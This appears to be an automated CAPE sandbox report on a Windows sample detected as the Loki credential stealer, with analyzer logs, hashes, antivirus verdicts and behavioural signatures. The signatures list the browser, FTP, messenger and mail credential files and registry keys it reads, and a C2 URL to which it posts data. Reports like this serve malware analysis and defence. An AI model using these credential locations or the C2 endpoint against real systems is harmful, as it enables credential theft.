2020-06-23 05:55:02,500 [root] DEBUG: DumpRegion: Dumped stack region from 0x00230000, size 0x1000.
2020-06-23 05:55:02,515 [root] DEBUG: DLL loaded at 0x04510000: C:\tmpt2nfl3rg\dll\oLMTGsbh (0xd5000 bytes).
2020-06-23 05:55:02,531 [root] DEBUG: DLL unloaded from 0x75350000.
2020-06-23 05:55:02,531 [root] DEBUG: DLL unloaded from 0x76E00000.
2020-06-23 05:55:02,531 [root] DEBUG: DLL unloaded from 0x75350000.
2020-06-23 05:55:02,531 [root] DEBUG: DLL unloaded from 0x76E00000.
2020-06-23 05:55:02,531 [root] DEBUG: DLL unloaded from 0x04510000.
2020-06-23 05:55:02,546 [root] DEBUG: Error 998 (0x3e6) - InjectDllViaThread: RtlCreateUserThread injection failed: Invalid access to memory location.
2020-06-23 05:55:02,546 [root] DEBUG: InjectDll: DLL injection via thread failed.
2020-06-23 05:55:02,546 [root] DEBUG: Failed to inject DLL C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:55:02,546 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 1804, error: 4294967288
2020-06-23 05:55:02,562 [root] DEBUG: ResumeThreadHandler: CurrentInjectionInfo 0x0 (Pid 1804).
2020-06-23 05:55:03,203 [root] DEBUG: DLL loaded at 0x74A70000: C:\Windows\system32\profapi (0xb000 bytes).
2020-06-23 05:55:04,015 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x15c amd local view 0x734E0000 to global list.
2020-06-23 05:55:04,046 [root] DEBUG: DLL loaded at 0x734E0000: C:\Program Files (x86)\Mozilla Thunderbird\nss3 (0x134000 bytes).
2020-06-23 05:55:04,140 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73840000 for section view with handle 0x15c.
2020-06-23 05:55:04,156 [root] DEBUG: DLL loaded at 0x73840000: C:\Program Files (x86)\Mozilla Thunderbird\mozglue (0x24000 bytes).
2020-06-23 05:55:04,234 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73BA0000 for section view with handle 0x15c.
2020-06-23 05:55:04,312 [root] DEBUG: DLL loaded at 0x73BA0000: C:\Windows\system32\dbghelp (0xeb000 bytes).
2020-06-23 05:55:04,328 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73D80000 for section view with handle 0x15c.
2020-06-23 05:55:04,328 [root] DEBUG: DLL loaded at 0x73D80000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-23 05:55:04,359 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x737C0000 for section view with handle 0x15c.
2020-06-23 05:55:04,359 [root] DEBUG: DLL loaded at 0x737C0000: C:\Windows\system32\MSVCP140 (0x71000 bytes).
2020-06-23 05:55:04,375 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x737A0000 for section view with handle 0x15c.
2020-06-23 05:55:04,375 [root] DEBUG: DLL loaded at 0x737A0000: C:\Windows\system32\VCRUNTIME140 (0x15000 bytes).
2020-06-23 05:55:04,390 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74DF0000 for section view with handle 0x15c.
2020-06-23 05:55:04,390 [root] DEBUG: DLL loaded at 0x74DF0000: C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0 (0x4000 bytes).
2020-06-23 05:55:04,390 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74D10000 for section view with handle 0x15c.
2020-06-23 05:55:04,406 [root] DEBUG: DLL loaded at 0x74D10000: C:\Windows\system32\ucrtbase (0xe0000 bytes).
2020-06-23 05:55:04,406 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74CD0000 for section view with handle 0x15c.
2020-06-23 05:55:04,421 [root] DEBUG: DLL loaded at 0x74CD0000: C:\Windows\system32\api-ms-win-core-timezone-l1-1-0 (0x3000 bytes).
2020-06-23 05:55:04,453 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74CC0000 for section view with handle 0x15c.
2020-06-23 05:55:04,453 [root] DEBUG: DLL loaded at 0x74CC0000: C:\Windows\system32\api-ms-win-core-file-l2-1-0 (0x3000 bytes).
2020-06-23 05:55:04,453 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74CB0000 for section view with handle 0x15c.
2020-06-23 05:55:04,453 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\api-ms-win-core-localization-l1-2-0 (0x3000 bytes).
2020-06-23 05:55:04,468 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74CA0000 for section view with handle 0x15c.
2020-06-23 05:55:04,468 [root] DEBUG: DLL loaded at 0x74CA0000: C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1 (0x3000 bytes).
2020-06-23 05:55:04,468 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C90000 for section view with handle 0x15c.
2020-06-23 05:55:04,468 [root] DEBUG: DLL loaded at 0x74C90000: C:\Windows\system32\api-ms-win-core-file-l1-2-0 (0x3000 bytes).
2020-06-23 05:55:04,468 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C70000 for section view with handle 0x15c.
2020-06-23 05:55:04,484 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\api-ms-win-crt-string-l1-1-0 (0x4000 bytes).
2020-06-23 05:55:04,484 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C60000 for section view with handle 0x15c.
2020-06-23 05:55:04,484 [root] DEBUG: DLL loaded at 0x74C60000: C:\Windows\system32\api-ms-win-crt-heap-l1-1-0 (0x3000 bytes).
2020-06-23 05:55:04,484 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C50000 for section view with handle 0x15c.
2020-06-23 05:55:04,484 [root] DEBUG: DLL loaded at 0x74C50000: C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0 (0x4000 bytes).
2020-06-23 05:55:04,500 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C40000 for section view with handle 0x15c.
2020-06-23 05:55:04,500 [root] DEBUG: DLL loaded at 0x74C40000: C:\Windows\system32\api-ms-win-crt-convert-l1-1-0 (0x4000 bytes).
2020-06-23 05:55:04,500 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C20000 for section view with handle 0x15c.
2020-06-23 05:55:04,500 [root] DEBUG: DLL loaded at 0x74C20000: C:\Windows\system32\api-ms-win-crt-locale-l1-1-0 (0x3000 bytes).
2020-06-23 05:55:04,515 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C30000 for section view with handle 0x15c.
2020-06-23 05:55:04,515 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\api-ms-win-crt-math-l1-1-0 (0x5000 bytes).
2020-06-23 05:55:04,515 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x734D0000 for section view with handle 0x15c.
2020-06-23 05:55:04,531 [root] DEBUG: DLL loaded at 0x734D0000: C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0 (0x5000 bytes).
2020-06-23 05:55:04,531 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C10000 for section view with handle 0x15c.
2020-06-23 05:55:04,531 [root] DEBUG: DLL loaded at 0x74C10000: C:\Windows\system32\api-ms-win-crt-time-l1-1-0 (0x3000 bytes).
2020-06-23 05:55:04,531 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74BD0000 for section view with handle 0x15c.
2020-06-23 05:55:04,531 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0 (0x3000 bytes).
2020-06-23 05:55:04,546 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74BF0000 for section view with handle 0x15c.
2020-06-23 05:55:04,718 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73490000 for section view with handle 0x15c.
2020-06-23 05:55:04,843 [root] DEBUG: DLL loaded at 0x73490000: C:\Windows\system32\WINMM (0x32000 bytes).
2020-06-23 05:55:04,843 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x719D0000 for section view with handle 0x15c.
2020-06-23 05:55:04,843 [root] DEBUG: DLL loaded at 0x719D0000: C:\Windows\system32\WSOCK32 (0x7000 bytes).
2020-06-23 05:55:04,984 [root] DEBUG: DLL unloaded from 0x734E0000.
2020-06-23 05:55:05,000 [root] DEBUG: DLL unloaded from 0x75350000.
2020-06-23 05:55:05,000 [root] DEBUG: DLL unloaded from 0x76E00000.
2020-06-23 05:55:05,171 [root] DEBUG: DLL unloaded from 0x75350000.
2020-06-23 05:55:05,171 [root] DEBUG: DLL unloaded from 0x76E00000.
2020-06-23 05:55:05,171 [root] DEBUG: DLL unloaded from 0x75AE0000.
2020-06-23 05:55:05,171 [root] DEBUG: DLL unloaded from 0x75350000.
2020-06-23 05:55:05,187 [root] DEBUG: DLL unloaded from 0x76E00000.
2020-06-23 05:55:05,593 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x168 amd local view 0x74CE0000 to global list.
2020-06-23 05:55:05,593 [root] DEBUG: DLL loaded at 0x73860000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2020-06-23 05:55:05,609 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2020-06-23 05:55:05,609 [root] DEBUG: DLL loaded at 0x74CE0000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2020-06-23 05:55:05,609 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C80000 for section view with handle 0x168.
2020-06-23 05:55:05,609 [root] DEBUG: DLL loaded at 0x74C80000: C:\Windows\system32\netutils (0x9000 bytes).
2020-06-23 05:55:05,625 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74B00000 for section view with handle 0x168.
2020-06-23 05:55:05,625 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\system32\srvcli (0x19000 bytes).
2020-06-23 05:55:05,625 [root] DEBUG: DLL loaded at 0x73840000: C:\Windows\system32\SAMLIB (0x12000 bytes).
2020-06-23 05:55:05,656 [root] DEBUG: DLL loaded at 0x74AD0000: C:\Windows\system32\USERENV (0x17000 bytes).
2020-06-23 05:55:05,671 [root] DEBUG: DLL loaded at 0x77270000: C:\Windows\syswow64\CRYPT32 (0x122000 bytes).
2020-06-23 05:55:05,671 [root] DEBUG: DLL loaded at 0x76DE0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2020-06-23 05:55:05,687 [root] DEBUG: DLL loaded at 0x74A90000: C:\Windows\System32\mswsock (0x3c000 bytes).
2020-06-23 05:55:05,703 [root] DEBUG: DLL loaded at 0x737F0000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-06-23 05:55:05,718 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-06-23 05:55:05,718 [root] DEBUG: DLL loaded at 0x74EA0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-06-23 05:55:06,140 [root] DEBUG: DLL loaded at 0x737B0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2020-06-23 05:55:06,156 [root] DEBUG: DLL loaded at 0x737A0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-06-23 05:55:06,171 [root] DEBUG: DLL loaded at 0x73610000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-06-23 05:55:06,171 [root] DEBUG: DLL loaded at 0x74A80000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-06-23 05:55:07,890 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\Roaming\E5A3EA\ACE282.lck
2020-06-23 05:55:08,890 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\Roaming\E5A3EA\ACE282.exe
2020-06-23 05:57:47,031 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-23 05:57:47,031 [lib.api.process] INFO: Terminate event set for process 472
2020-06-23 05:57:47,046 [root] DEBUG: Terminate Event: Attempting to dump process 472
2020-06-23 05:57:52,031 [lib.api.process] INFO: Termination confirmed for process 472
2020-06-23 05:57:52,031 [root] INFO: Terminate event set for process 472.
2020-06-23 05:57:52,031 [root] INFO: Created shutdown mutex.
2020-06-23 05:57:52,828 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00000000FFBB0000.
2020-06-23 05:57:52,828 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-06-23 05:57:52,859 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FFBB0000.
2020-06-23 05:57:52,906 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000001331C.
2020-06-23 05:57:52,953 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x50000.
2020-06-23 05:57:52,968 [root] DEBUG: Terminate Event: Shutdown complete for process 472 but failed to inform analyzer.
2020-06-23 05:57:53,031 [root] INFO: Shutting down package.
2020-06-23 05:57:53,031 [root] INFO: Stopping auxiliary modules.
2020-06-23 05:57:56,781 [lib.common.results] WARNING: File C:\ICwvvaQtg\bin\procmon.xml doesn't exist anymore
2020-06-23 05:57:56,781 [root] INFO: Finishing auxiliary modules.
2020-06-23 05:57:56,781 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-06-23 05:57:56,812 [root] WARNING: Folder at path "C:\ICwvvaQtg\debugger" does not exist, skip.
2020-06-23 05:57:56,828 [root] WARNING: Monitor injection attempted but failed for process 1804.
2020-06-23 05:57:56,828 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7x64_2 win7x64_6 KVM 2020-06-23 05:54:25 2020-06-23 05:59:27

File Details

File Name gunzipped
File Size 654336 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
PE timestamp 1992-06-19 22:22:17
MD5 325216037ccc1b9478c3fe13ef486a12
SHA1 fee1cd6be1a20cad1c2639ff2013fc5042b53f32
SHA256 8365241d902a7196708f6ba21b1438661ac1ea2618b8046bfe8a742e1403106b
SHA512 ed23f9eaf042ef146e33b70681e4e41a0be270f7ef2d66b99f9df29a6ada37e8d60bde3088c1ca322fcdc82e823e7d7e5d4ecbc6433c727e865e59f07ae8faaa
CRC32 C88DE730
Ssdeep 12288:ADRuXrEbb00e9ElcwOixtthKGc7WR5Sc7YpDqIZQfkBzWTBzVvJlu:qYbQhe9RKthmg5ANekBzWTTJo
Download Download ZIP Resubmit sample

Signatures

Behavioural detection: Executable code extraction - unpacking
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 4492 trigged the Yara rule 'shellcode_patterns'
Hit: PID 4492 trigged the Yara rule 'HeavensGate'
Hit: PID 4492 trigged the Yara rule 'Loki'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: gunzipped.exe, PID 4492
Dynamic (imported) function loading detected
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExA
DynamicLoader: oleaut32.dll/VariantChangeTypeEx
DynamicLoader: oleaut32.dll/VarNeg
DynamicLoader: oleaut32.dll/VarNot
DynamicLoader: oleaut32.dll/VarAdd
DynamicLoader: oleaut32.dll/VarSub
DynamicLoader: oleaut32.dll/VarMul
DynamicLoader: oleaut32.dll/VarDiv
DynamicLoader: oleaut32.dll/VarIdiv
DynamicLoader: oleaut32.dll/VarMod
DynamicLoader: oleaut32.dll/VarAnd
DynamicLoader: oleaut32.dll/VarOr
DynamicLoader: oleaut32.dll/VarXor
DynamicLoader: oleaut32.dll/VarCmp
DynamicLoader: oleaut32.dll/VarI4FromStr
DynamicLoader: oleaut32.dll/VarR4FromStr
DynamicLoader: oleaut32.dll/VarR8FromStr
DynamicLoader: oleaut32.dll/VarDateFromStr
DynamicLoader: oleaut32.dll/VarCyFromStr
DynamicLoader: oleaut32.dll/VarBoolFromStr
DynamicLoader: oleaut32.dll/VarBstrFromCy
DynamicLoader: oleaut32.dll/VarBstrFromDate
DynamicLoader: oleaut32.dll/VarBstrFromBool
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/AnimateWindow
DynamicLoader: comctl32.dll/InitializeFlatSB
DynamicLoader: comctl32.dll/UninitializeFlatSB
DynamicLoader: comctl32.dll/FlatSB_GetScrollProp
DynamicLoader: comctl32.dll/FlatSB_SetScrollProp
DynamicLoader: comctl32.dll/FlatSB_EnableScrollBar
DynamicLoader: comctl32.dll/FlatSB_ShowScrollBar
DynamicLoader: comctl32.dll/FlatSB_GetScrollRange
DynamicLoader: comctl32.dll/FlatSB_GetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_GetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_SetScrollRange
DynamicLoader: USER32.dll/SetLayeredWindowAttributes
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: nss3.dll/NSS_Init
DynamicLoader: nss3.dll/NSS_Shutdown
DynamicLoader: nss3.dll/PK11_GetInternalKeySlot
DynamicLoader: nss3.dll/PK11_FreeSlot
DynamicLoader: nss3.dll/PK11_Authenticate
DynamicLoader: nss3.dll/PK11SDR_Decrypt
DynamicLoader: nss3.dll/PK11_CheckUserPassword
DynamicLoader: nss3.dll/SECITEM_FreeItem
DynamicLoader: kernel32.dll/SetThreadDescription
DynamicLoader: kernel32.dll/InitializeCriticalSectionEx
DynamicLoader: softokn3.dll/NSC_GetFunctionList
DynamicLoader: softokn3.dll/NSC_ModuleDBFunc
DynamicLoader: softokn3.dll/NSC_GetFunctionList
DynamicLoader: freebl3.dll/FREEBL_GetVector
DynamicLoader: CRYPTBASE.dll/SystemFunction001
DynamicLoader: CRYPTBASE.dll/SystemFunction002
DynamicLoader: CRYPTBASE.dll/SystemFunction003
DynamicLoader: CRYPTBASE.dll/SystemFunction004
DynamicLoader: CRYPTBASE.dll/SystemFunction005
DynamicLoader: CRYPTBASE.dll/SystemFunction028
DynamicLoader: CRYPTBASE.dll/SystemFunction029
DynamicLoader: CRYPTBASE.dll/SystemFunction034
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: CRYPTBASE.dll/SystemFunction040
DynamicLoader: CRYPTBASE.dll/SystemFunction041
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: vaultcli.dll/VaultEnumerateItems
DynamicLoader: vaultcli.dll/VaultEnumerateVaults
DynamicLoader: vaultcli.dll/VaultFree
DynamicLoader: vaultcli.dll/VaultGetItem
DynamicLoader: vaultcli.dll/VaultOpenVault
DynamicLoader: vaultcli.dll/VaultCloseVault
DynamicLoader: nss3.dll/NSS_Init
DynamicLoader: nss3.dll/NSS_Shutdown
DynamicLoader: nss3.dll/PK11_GetInternalKeySlot
DynamicLoader: nss3.dll/PK11_FreeSlot
DynamicLoader: nss3.dll/PK11_Authenticate
DynamicLoader: nss3.dll/PK11SDR_Decrypt
DynamicLoader: nss3.dll/PK11_CheckUserPassword
DynamicLoader: nss3.dll/SECITEM_FreeItem
DynamicLoader: nss3.dll/sqlite3_finalize
DynamicLoader: nss3.dll/sqlite3_step
DynamicLoader: nss3.dll/sqlite3_close
DynamicLoader: nss3.dll/sqlite3_column_text
DynamicLoader: nss3.dll/sqlite3_open16
DynamicLoader: nss3.dll/sqlite3_prepare_v2
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
CAPE extracted potentially suspicious content
gunzipped.exe: Unpacked Shellcode
gunzipped.exe: Unpacked Shellcode
gunzipped.exe: Unpacked Shellcode
gunzipped.exe: Loki Payload: 32-bit executable
gunzipped.exe: Loki
HTTP traffic contains suspicious features which may be indicative of malware related traffic
post_no_referer: HTTP traffic contains a POST request with no referer header
http_version_old: HTTP traffic uses version 1.0
suspicious_request: http://airmanselectiontest.com/data/Panel/fre.php
Performs some HTTP requests
url: http://airmanselectiontest.com/data/Panel/fre.php
The binary contains an unknown PE section name indicative of packing
unknown section: name: CODE, entropy: 6.52, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00061a00, virtual_size: 0x00061874
unknown section: name: DATA, entropy: 5.02, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0000b000, virtual_size: 0x0000ae28
unknown section: name: BSS, entropy: 0.00, characteristics: IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00000bf9
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 6.96, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00029600, virtual_size: 0x00029594
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error File not valid C\Users\Louise\AppData\Local\Temp\gunzipped
Behavioural detection: Injection (Process Hollowing)
Injection: gunzipped.exe(4492) -> gunzipped.exe(1804)
Executed a process and injected code into it, probably while unpacking
Injection: gunzipped.exe(4492) -> gunzipped.exe(1804)
Deletes its original binary from disk
Behavioural detection: Injection (inter-process)
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: services.exe (472) called API GetSystemTimeAsFileTime 4487935 times
Steals private information from local Internet browsers
file: C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\logins.json
file: C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\pkcs11.txt
file: C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\profiles.ini
file: C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\key4.db
file: C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\cert9.db
file: C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Login Data
A process attempted to collect browser passwords
Process: gunzipped.exe (1804)
CAPE detected the Loki malware family
File has been identified by 29 Antiviruses on VirusTotal as malicious
Bkav: W32.AIDetectVM.malwareB
FireEye: Generic.mg.325216037ccc1b94
K7AntiVirus: Trojan ( 005680341 )
K7GW: Trojan ( 005680341 )
Cybereason: malicious.be1a20
Invincea: heuristic
BitDefenderTheta: Gen:[email protected]
F-Prot: W32/Injector.ABY.gen!Eldorado
Symantec: ML.Attribute.HighConfidence
ESET-NOD32: a variant of Win32/Injector.EMJE
Paloalto: generic.ml
Kaspersky: UDS:DangerousObject.Multi.Generic
Rising: Trojan.Injector!1.AFE3 (CLOUD)
Fortinet: W32/Injector.ELZG!tr
Trapmine: suspicious.low.ml.score
SentinelOne: DFI - Suspicious PE
Cyren: W32/Injector.ABY.gen!Eldorado
Endgame: malicious (high confidence)
Microsoft: Trojan:Win32/Wacatac.C!ml
ZoneAlarm: UDS:DangerousObject.Multi.Generic
Cynet: Malicious (score: 100)
AhnLab-V3: Suspicious/Win.Delphiless.X2066
Acronis: suspicious
McAfee: Fareit-FTB!325216037CCC
APEX: Malicious
Tencent: Win32.Backdoor.Fareit.Auto
MaxSecure: Trojan.Malware.300983.susgen
CrowdStrike: win/malicious_confidence_90% (D)
Qihoo-360: HEUR/QVM05.1.16F3.Malware.Gen
Creates a copy of itself
copy: C:\Users\Louise\AppData\Roaming\E5A3EA\ACE282.exe
Harvests credentials from local FTP client softwares
file: C:\Users\Louise\AppData\Roaming\FileZilla\sitemanager.xml
file: C:\Users\Louise\AppData\Roaming\FileZilla\recentservers.xml
file: C:\Users\Louise\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file: C:\Users\Louise\AppData\Roaming\FTPGetter\servers.xml
file: C:\Users\Louise\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Harvests information related to installed instant messenger clients
file: C:\Users\Louise\AppData\Roaming\.purple\accounts.xml
Harvests information related to installed mail clients
file: C:\Users\Louise\AppData\Roaming\Thunderbird\profiles.ini
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Collects information to fingerprint the system
Anomalous binary characteristics
anomaly: Timestamp on binary predates the release date of the OS version it requires by at least a year

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 51.105.208.173 [VT] United Kingdom
Y 13.107.42.23 [VT] United States
N 103.129.98.18 [VT] unknown

DNS

Name Response Post-Analysis Lookup
airmanselectiontest.com [VT] A 103.129.98.18 [VT] 103.129.98.18 [VT]

Summary

C:\Users\Louise\AppData\Local\Temp\gunzipped.ENU
C:\Users\Louise\AppData\Local\Temp\gunzipped.ENU.DLL
C:\Users\Louise\AppData\Local\Temp\gunzipped.EN
C:\Users\Louise\AppData\Local\Temp\gunzipped.EN.DLL
C:\Program Files (x86)\Mozilla Firefox\nss3.dll
C:\Users\Louise\AppData\Local\Temp\mozglue.dll
C:\Windows\System32\mozglue.dll
C:\Windows\system\mozglue.dll
C:\Windows\mozglue.dll
C:\Python27\mozglue.dll
C:\Python27\Scripts\mozglue.dll
C:\Windows\System32\wbem\mozglue.dll
C:\Windows\System32\WindowsPowerShell\v1.0\mozglue.dll
C:\ProgramData\chocolatey\bin\mozglue.dll
C:\Users\Louise\AppData\Local\Programs\Python\Python38-32\Scripts\mozglue.dll
C:\Users\Louise\AppData\Local\Programs\Python\Python38-32\mozglue.dll
C:\Users\Louise\AppData\Roaming\Python\Scripts\mozglue.dll
C:\Program Files (x86)\Mozilla Firefox\mozglue.dll
C:\Users\Louise\AppData\Local\Temp\VERSION.dll
C:\Windows\System32\version.dll
C:\Users\Louise\AppData\Local\Temp\dbghelp.dll
C:\Windows\System32\dbghelp.dll
C:\Users\Louise\AppData\Local\Temp\MSVCP140.dll
C:\Windows\System32\msvcp140.dll
C:\Users\Louise\AppData\Local\Temp\VCRUNTIME140.dll
C:\Windows\System32\VCRUNTIME140.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-runtime-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\ucrtbase.DLL
C:\Windows\System32\ucrtbase.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-core-timezone-l1-1-0.dll
C:\Windows\System32\api-ms-win-core-timezone-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-core-file-l2-1-0.dll
C:\Windows\System32\api-ms-win-core-file-l2-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-core-localization-l1-2-0.dll
C:\Windows\System32\api-ms-win-core-localization-l1-2-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-core-processthreads-l1-1-1.dll
C:\Windows\System32\api-ms-win-core-processthreads-l1-1-1.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-core-file-l1-2-0.dll
C:\Windows\System32\api-ms-win-core-file-l1-2-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-string-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-string-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-heap-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-heap-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-stdio-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-stdio-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-convert-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-convert-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-locale-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-locale-l1-1-0.dll
C:\Users\Louise\AppData\Local\Temp\api-ms-win-crt-math-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-math-l1-1-0.dll
